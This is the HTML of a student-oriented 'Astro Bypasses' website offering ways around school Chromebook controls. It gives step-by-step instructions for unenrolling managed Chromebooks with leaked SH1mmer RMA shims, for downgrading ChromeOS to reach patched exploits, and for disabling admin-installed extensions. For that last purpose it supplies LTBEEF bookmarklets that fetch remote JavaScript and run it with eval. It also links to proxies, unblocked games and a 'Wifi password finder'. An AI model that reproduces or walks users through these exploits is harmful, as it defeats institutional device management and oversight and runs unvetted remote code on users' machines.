<!DOCTYPE html>
<!--IM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THE INFORMATION PROVIDED ON THIS SITE. THIS SITE IS FOR EDUCATIONAL PURPOSES ONLY-->
<html lang="en"><!-- Bootstrap CSS --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" href="./Astro Operations_files/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

<link rel="stylesheet" href="./Astro Operations_files/font-awesome.css">

<script src="./Astro Operations_files/jquery-3.4.1.slim.min.js.descarga" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="./Astro Operations_files/popper.min.js.descarga" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="./Astro Operations_files/bootstrap.min.js.descarga" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>


    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="All In One Astro Bypasses.">
    <link rel="stylesheet" href="./Astro Operations_files/bootstrap.min(1).css">
    <link rel="stylesheet" href="./Astro Operations_files/styles.css">
    <link rel="stylesheet" href="./Astro Operations_files/all.min.css">
    <script src="./Astro Operations_files/ism-2.2.min.js.descarga"></script>
    <style>
        .bg-home-4 {
            padding-top: 400px;
        }
    </style>
    <title>Astro Bypasses</title>
	<link rel="icon" href="./Astro Operations_files/icon.png">
</head>
<style>
    .bg-home-4 {
        padding-bottom: 365px;
    }
</style>
<body>
  
    <nav class="navbar navbar-expand-lg fixed-top navbar-custom" id="myNAV" style="background-color: black; padding: 10px;">
        <div class="container">
            <p>Astro Bypasses</p>
           
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
                <i class="mdi mdi-menu"></i>
            </button>
            <div class="collapse navbar-collapse" id="navbarCollapse">
                <ul class="navbar-nav ml-auto navbar-center" id="mySidenav" style="color: #161616;">
                    <li class="nav-item">
                        <a href="https://bypasses.net">Home</a>
                    </li>
					<li class="nav-item">
                        <a href="https://discord.gg/5bu8eYYRYu" target="_blank">Discord</a>
                    </li>
                    <li class="nav-item">
                        <a href="https://discord.com/channels/@me" target="_blank">by fruvs#7642</a>
                    </li>
				</ul>
            </div>
        </div>
    </nav>

  
    <section class="bg-home-4" id="home">
        <div class="home-bg-overlay"></div>
        <div class="home-center">
            <div class="home-desc-center">
                <div class="container">
                    <div class="row vertical-content">
                        <div class="col-lg-6">
                            <center>
                                <img src="./Astro Operations_files/icon.png" width="225" height="225">
                            </center>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="svg-border-rounded">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 144.54 17.34" preserveAspectRatio="none" fill="#161616"><path d="M144.54,17.34H0V0H144.54ZM0,0S32.36,17.34,72.27,17.34,144.54,0,144.54,0"></path></svg>
        </div>
    </section>
    <section class="section bg-client" id="features">
        <div class="what-to-do pad">
            <div class="container text-center">
                <h1 class="font-m">Bypasses</h1>
                <p>There are a variety of bypasses especially focused on chromeOS bypasses <a rel="learn more" href="https://discord.gg/5bu8eYYRYu" target="_blank">Learn more</a>
                <p></p>
                <div class="row">
                    <div class="col-lg-4 pt-5">
                        <div class="row">
                            <i class="far fa-gem"></i>
                            <div class="col-8 text-left">
                                <h1 class="font-m">Useful Tools</h1>
                                <p class="gray">
                                    <html>
                                    <body>
                                       

                                        <html>
                                            <head>
                                                <style>
                                                    @import url('https://fonts.googleapis.com/css2?family=Comfortaa&display=swap');
                                                
                                                    * {
                                                        color: white;
                                                        font-family: arial;
                                                    }
                                                
                                                    .my-button {
                                                        font-family: Comfortaa;
                                                        width: 220px;
                                                        height: 40px;
                                                        border-radius: 12px;
                                                        background-color: #5d00ff;
                                                        border: none;
                                                        transition: background-color 500ms;
                                                        margin: 0 auto;
                                                        border-width: 2px;
                                                        border-style: solid;
                                                        border-color: white;
                                                    }
                                                
                                                    .my-button:hover {
                                                        transition: transform .6s;
                                                        background-color: #310070;
                                                        -ms-transform: scale(1.1);
                                                        /* IE 9 */
                                                        -webkit-transform: scale(1.1);
                                                        /* Safari 3-8 */
                                                        transform: scale(1.1);
                                                    }
                                                </style>
                                            </head>
                                            <body>
                                                <p>Auto Update Blocker</p>
                                                <a href="/CAUB.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong>CAUB</strong></button></a>
                                                <p>Wifi password finder</p>
                                                <a href="/wifitool.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong>Wifi Tool</strong></button></a>
                                                
                                            </body>
                                            </html>
                                            
                                

                                    <div></div>
                                </body></html>
                            </div>
                        </div>

                    </div>
                    <div class="col-lg-4 pt-5">
                        <div class="row">
                            <i class="fas fa-gem"></i>
                            <div class="col-8 text-left">
                                <h1 class="font-m">Other</h1>
                                <p class="gray">
                                    <html>
                                        <body>
                                           
    
                                            <html>
                                                <head>
                                                    <style>
                                                        @import url('https://fonts.googleapis.com/css2?family=Comfortaa&display=swap');
                                                    
                                                        * {
                                                            color: white;
                                                            font-family: arial;
                                                        }
                                                    
                                                        .my-button {
                                                            font-family: Comfortaa;
                                                            width: 220px;
                                                            height: 40px;
                                                            border-radius: 12px;
                                                            background-color: #5d00ff;
                                                            border: none;
                                                            transition: background-color 500ms;
                                                            margin: 0 auto;
                                                            border-width: 2px;
                                                            border-style: solid;
                                                            border-color: white;
                                                        }
                                                    
                                                        .my-button:hover {
                                                            transition: transform .6s;
                                                            background-color: #7e0000;
                                                            -ms-transform: scale(1.1);
                                                            /* IE 9 */
                                                            -webkit-transform: scale(1.1);
                                                            /* Safari 3-8 */
                                                            transform: scale(1.1);
                                                        }
                                                    </style>
                                                </head>
                                                <body>
                                                    <p>Unenroll without SH1mmer</p>
                                                    <a href="/nosh1mm.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong>No SH1mmer</strong></button></a>
                                                    <p>Website Embeder</p>
                                                    <a href="/webembed.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong>Website Embeder</strong></button></a>
                                                   
                                                    
                                                </body>
                                                </html>
                                                
                                    
    
                                        <div></div>
                                    </body></html>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 pt-5">
                                 <div class="row">
                            <i class="fas fa-gem"></i>
                            <div class="col-8 text-left">
                                <h1 class="font-m">Unblockers</h1>
                                <p class="gray">
                                    <html>
                                        <body>
                                           
    
                                            <html>
                                                <head>
                                                    <style>
                                                        @import url('https://fonts.googleapis.com/css2?family=Comfortaa&display=swap');
                                                    
                                                        * {
                                                            color: white;
                                                            font-family: arial;
                                                        }
                                                    
                                                        .my-button {
                                                            font-family: Comfortaa;
                                                            width: 220px;
                                                            height: 40px;
                                                            border-radius: 12px;
                                                            background-color: #5d00ff;
                                                            border: none;
                                                            transition: background-color 500ms;
                                                            margin: 0 auto;
                                                            border-width: 2px;
                                                            border-style: solid;
                                                            border-color: white;
                                                        }
                                                    
                                                        .my-button:hover {
                                                            transition: transform .6s;
                                                            background-color: #7e0000;
                                                            -ms-transform: scale(1.1);
                                                            /* IE 9 */
                                                            -webkit-transform: scale(1.1);
                                                            /* Safari 3-8 */
                                                            transform: scale(1.1);
                                                        }
                                                    </style>
                                                </head>
                                                <body>
                                                    <p>Proxys</p>
                                                    <a href="/blocker.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong>Unblockers</strong></button></a>
                                                    <p>Local Games</p>
                                                    <a href="/emag.html"><button class="my-button" style="display: block; margin: 0 auto;"><strong> Games</strong></button></a>
                                                   
                                                    
                                                </body>
                                                </html>
                                                
                                    
    
                                        <div></div>
                                    </body></html>
                                </p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <section class="section bg-client" id="faq">
        <div class="faq_area" id="faq">
            <div class="container">
                <div class="row justify-content-center">
            <div class="col-12 col-sm-8 col-lg-6">
                <!-- Section Heading-->
                <div class="section_heading text-center wow fadeInUp" data-wow-delay="0.2s" style="visibility: visible; animation-delay: 0.2s; animation-name: fadeInUp;">
                    <h3><span>Frequently </span> Asked Questions</h3>
                    Here in this section you can clarify all your questions you have. If you have more, you can join our <a rel="discord" href="https://discord.gg/5bu8eYYRYu" target="_blank">Discord</a> and ask.
                    <div class="line"></div>
                </div>
            </div>
        </div>
        <br>
        <br>
        <div class="row justify-content-center">
            <!-- FAQ Area-->
            <div class="col-12 col-sm-10 col-lg-8">
                <div class="accordion faq-accordian" id="faqAccordion">
                    <div class="card border-0 wow fadeInUp" data-wow-delay="0.2s" style="visibility: visible; animation-delay: 0.2s; animation-name: fadeInUp;">
                        <div class="card-header" id="headingOne">
                            <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseOne" aria-expanded="true" aria-controls="collapseOne">How to use SH1mmer<span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseOne" aria-labelledby="headingOne" data-parent="#faqAccordion">
                            <div class="card-body">
                                <h1>What you will need.</h1>
					<p>A USB with at least 8 GBs of storage.</p>

					<p>A personal computer or chromebook; note that you need admin perms on Windows/MacOS.</p>
				    
					<h2>Steps</h2>
					<p>First, you'll need to find your managed Chromebook's board name. This can be done by going to chrome://version on your Chromebook and copying the word after "stable-channel", or with a variety of other methods.</p>

					<p>If your board name is in the list below, your board has a publicly leaked RMA shim. If it's not, you'll have to source it on your own... somehow.</p>

brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zork
					
					<p>First you need to download a sh1mmer bin. Download a shim at  <a href="https://ia804709.us.archive.org/view_archive.php?archive=/31/items/dl2.sh1mmer.me/dl2.sh1mmer.me.zip" target="_blank">this site</a>.</p>
					
					<p>Download the  <a href="https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en" target="_blank">Chromebook Recovery Utility extension</a> on your personal computer as well.</p>

					<p>Once the downloads are complete, launch the recovery utility and plug your USB into your personal computer. Note that your USB will be completely cleared and partitioned.</p>

					<p>In the recovery utility window, click the settings icon and press "use local image".</p>
					
					<p>Select your shim file, identify your USB, and start the writing process. This will take about 10 minutes.</p>
					
					<h3>Executing on Chromebook</h3>
					
<p>Once writing is complete, enter recovery mode on your Chromebook. This is done by pressing the power button, reload key (↻), and esc key at the same time. It should look something like this</p>
	
<p><img src="https://sh1mmer.me/assets/recover_white.png" width="300" 
     height="300" /><img src="https://sh1mmer.me/assets/recover_black.png" width="300" 
     height="300" /></p>
				    <p>Press ctrl+d on this screen, then press enter.</p>
				    <p>It will now say something about "returning to secure mode" or that "OS verification is off". You will most likely not actually be in dev mode, but the exploit will work regardless. Your screen should look like one of the images below:</p>
				    <img src="https://sh1mmer.me/assets/confirm_white.png" width="300" 
     height="300" /><img src="https://sh1mmer.me/assets/confirm_black.png" width="300" 
			 height="300" /></P>
				<p>On this screen, press the power button, reload key (↻), and esc key at the same time again! This is very important and cannot be skipped.</p>
				<p>Once it re-shows the original recovery screen, plug your shimmed USB into your Chromebook, and press the power button, reload key (↻), and esc key again. After a brief black-and-white loading screen, you should be in the SH1MMER menu.</p>
				<title>What now?</title>
				<p>You will now be able to, among other things, unenroll your Chromebook. It will now behave entirely as if it is a personal computer and no longer contain spyware or blocker extensions. After you do this and get past the "determining device configuration" screen, you will be able to actually turn dev mode on.</P>
			    <p>Note that while unenrolled, it is recommended to add your personal account first, then add your school account, then switch between the two as needed. Mercury Workshop does not condone the use of SH1MMER or unenrolling to cheat in school.</p>
			    <h4>Credits</h4>
			    <h5>Mercury Workshop members</h5>
			     <li>CoolElectronics: Creating the SH1MMER payload</li>
    <li>r58Playz: GUI script &amp; misc development</li>
    <li>vfrog: Infiltrating Lenovo headquarters to get shims, also adding a firmware-level keylogger</li>
    <li>generic: Adding firmware-level irwinCoin miner, and hosting alternate file mirror & getting audio to work</li>
    <li>ULTRA BLUE: Testing &amp; discovering how to disable root-fs verification</li>
    <li>Sharp_Jack: Creating the wax automation tool</li>
    <li>Unciaur: Testing</li>
    <li>TheMemeSniper/Kaitlin: Testing</li>
    <li>OlyB: Scraping more shims</li>
    <li>CVFD: Scraping more shims</li>
    <li>Rafflesia: Hosting &amp; building shims</li>
    <li>Catakang: Building shims</li>
    <li>[REDACTED]: SH1MMER UI design</li>
    <li>Bypassi: SH1MMER.me website design</li>
    <li>aub: testing</li>
                            </div>
                        </div>
                        <div class="dark">
                          <div>
                          </div>
                        </div>
                    </div>
                    <div class="card border-0 wow fadeInUp" data-wow-delay="0.3s" style="visibility: visible; animation-delay: 0.3s; animation-name: fadeInUp;">
                        <div class="card-header" id="headingTwo">
                            <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseTwo" aria-expanded="true" aria-controls="collapseTwo">Downgrading<span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseTwo" aria-labelledby="headingTwo" data-parent="#faqAccordion">
                            <div class="card-body">
				    <h6>Requirements:</h6>

<p>Personal computer</p>
<p>Flash drive with 8 gigabytes of storage</p>
<p>Chromebook Recovery Utility Extension</p>
<p>A Brain</p>
<p>1 Go to chrome://version on your Chromebook and find what board your Chromebook is on. Take a note of it.</p>
<p><img src="https://github.com/frizys/fruvs/blob/main/docs/assets/board.png?raw=true" alt="board.png"></P>

<p>2 Go to Chrome100.dev and scroll down until you find your board. Click on it and find the version you want to downgrade to.</p>

<p>3 Download the file for the version you want to install.

<p>4 Plug in your flash drive to your personal computer and format it to FAT32 file system.</p>

<p>5 Install the <a href="https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en" target="_blank">Chromebook Recovery Utility extension</a> from the Chrome Web Store.</p>

<p>6 Open the extension by clicking on it. Click the gear icon and then press "Use local image" and find the file you downloaded.</p>
<p><img src=" https://github.com/frizys/fruvs/blob/main/docs/assets/chrome%20rec%20utility%20crop.png?raw=true"></P>

<p>7 Insert your flash drive and start the process of creating a recovery drive by following the instructions on the extension.</p>

<p>8 Once the recovery drive is created, unplug it and prepare your Chromebook. Make sure it is at least at 30% battery charge for safety.</p>

<p>9 Power off your Chromebook and remove any external devices.</p>

<p>10 Press and hold the Esc and Refresh keys, then press the Power button to turn on your Chromebook.</p>

<p>11 When the "Chrome OS is missing or damaged" screen appears, insert the recovery drive into your Chromebook.</p>
		     
                            </div>
                        </div>
                        <div class="dark">
                          <div>
                          </div>
                        </div>
                    </div>
                    <div class="card border-0 wow fadeInUp" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeInUp;">
                        <div class="card-header" id="headingThree">
                            <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseThree" aria-expanded="true" aria-controls="collapseThree">LTBEEF<span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseThree" aria-labelledby="headingThree" data-parent="#faqAccordion">
                            <div class="card-body">
                                <h7>LTBEEF</h7>
                                 <p>(Literally The Best Exploit Ever Found) is an exploit found by bypassi (Bypassi#7037) and is a great way to disable spyware and extensions that was installed on your chromebook by your schools Admins!.</p>
                                <p>Please note that this exploit has been patched in newer versions of Chrome, it works on chromeOS versions 105, 102 and older to downgrade go to the downgrade tutorial!</p>
                                <div style="border: solid; padding: 5px;">
                                    <a class="btn" style="color: lightblue;" href="javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});"><strong>LTBEEF</strong></a>
                                    <a class="btn" style="color: lightblue;" href="javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())"><strong>Ingot</strong></a>
                                </div>
                                <p>- Drag either of the above buttons to your bookmarks bar</p>
                                <p>Visit <a href="https://chrome.google.com/webstoreHIBDD" target="_blank">https://chrome.google.com/webstoreHIBDD</a>.</p>(This is a 404 page, and that is ok.)</p>
                                    <p>Click the bookmark (<strong>NOTE: This only works on the Chrome Web Store.</strong>)</p>
                                    <p>Switch off the extensions you don't want to have anymore. You're done!</p>
                            </div>
                        </div>
                        <div class="dark">
                          <div>
                          </div>
                        </div>
                    </div>
                    
                   
                    

                   <!-- <div class="card border-0 wow fadeInUp" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeInUp;">
                        <div class="card-header border-top" id="headingSix">
                            <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseSix" aria-expanded="true" aria-controls="collapseSix">Another Title<span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseSix" aria-labelledby="headingSix" data-parent="#faqAccordion">
                            <div class="card-body">
                                <p>test</p>
                            </div>
                            <div class="dark">
                                <div></div>
                            </div>
                        </div>
                    </div>-->

                    <div class="card border-0 wow fadeInUp" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeInUp;">
                        <div class="card-header border-top" id="headingSeven">
                          <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseSeven" aria-expanded="true" aria-controls="collapseSeven"><strong>DOWNLOAD UNBLOCKED GAMES</strong><span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseSeven" aria-labelledby="headingSeven" data-parent="#faqAccordion">
                          <div class="card-body">
                            <p>Here are some games that you could play UNBLOCKED</p>
                            <p>To play simply download the file and open it</p>
                            <p>There now you have a game that is UNBLOCKED</p>
                            <p>MORE GAMES COMING SOON</p>
                            <a href="Zombs.html" download="Zombocalypse"><strong>Download Zombocalypse</strong></a>
                            

                          </div>
                          <div class="dark">
                            <div></div>
                          </div>
                        </div>
                      </div>
                    <div class="card border-0 wow fadeInUp" data-wow-delay="0.4s" style="visibility: visible; animation-delay: 0.4s; animation-name: fadeInUp;">
                        <div class="card-header border-top" id="headingNine">
                            <h6 class="mb-0 collapsed" data-toggle="collapse" data-target="#collapseNine" aria-expanded="true" aria-controls="collapseNine">Proxy<span class="lni-chevron-up"></span></h6>
                        </div>
                        <div class="collapse" id="collapseNine" aria-labelledby="headingNine" data-parent="#faqAccordion">
                            <div class="card-body">
                                <html>
                                    <body>
                                        <a href="/astro.html"><button style="display: block; margin: 0 auto;"><strong>Mercury</strong></button></a>


                                <style>
                                    @import url('https://fonts.googleapis.com/css2?family=Comfortaa&display=swap');
                                
                                    * {
                                        color: white;
                                        font-family: arial;
                                        
                                    }
                                
                                    .card-body button {
                                        font-family: Comfortaa;
                                        width: 220px;
                                        height: 40px;
                                        border-radius: 12px;
                                        background-color: #5d00ff;
                                        border: none;
                                        transition: background-color 500ms;
                                        margin: 0 auto;
                                        border-width: 2px;
                                        border-style: solid;
                                        border-color: white;
                                    }
                                
                                    .card-body button:hover {
                                        transition: transform .6s;
                                        background-color: #310070;
                                        -ms-transform: scale(1.1);
                                        /* IE 9 */
                                        -webkit-transform: scale(1.1);
                                        /* Safari 3-8 */
                                        transform: scale(1.1);
                                    }
                                </style>
                                

                                    <div></div>
                                </body></html>
                            </div>
                            <div class="dark">
                                <div></div>
                            </div>
                        </div>
                    </div>


                </div>
            </div>
        </div>
    </div>
</div>
    </section>
    <script src='https://cdn.jsdelivr.net/npm/@widgetbot/crate@3' async defer>
	    new Crate({
	        server: '1075199537859285083', // Null Flux
	        channel: '1075219720581693482' // #💬・chat
	    })
	</script>
        <section class="bg-client">
             <footer class="text-center small tm-footer">
             	 Astro Bypasses
              <br>
             Made By Fruvs#7642
            </footer>
        </section>
    <div id="myModal" class="modal">
        <!-- Modal content -->
        <span class="close"></span>
        <div class="modal-content">
            <h1>Astro</h1>
        </div>

    </div>
    <script>
        window.onscroll = function() {
            scrollFunction()
        };

        function scrollFunction() {
            if (document.body.scrollTop > 80 || document.documentElement.scrollTop > 80) {
                document.getElementById("myNAV").style.backgroundColor = "black";
                document.getElementById("myNAV").style.padding = "10px 10px";
            } else {
                document.getElementById("myNAV").style.padding = "50px 10px";
                document.getElementById("myNAV").style.backgroundColor = "rgba(255, 0, 0, 0.00)";
            }
        }
    </script>
    <script>

        var modal = document.getElementById("myModal");

        
        var btn = document.getElementById("myBtn");

       
        var span = document.getElementsByClassName("close")[0];

	    
        btn.onclick = function() {
            modal.style.display = "block";
        }

       
        span.onclick = function() {
            modal.style.display = "none";
        }

       
        window.onclick = function(event) {
            if (event.target == modal) {
                modal.style.display = "none";
            }
        }
    </script>
</body></html>
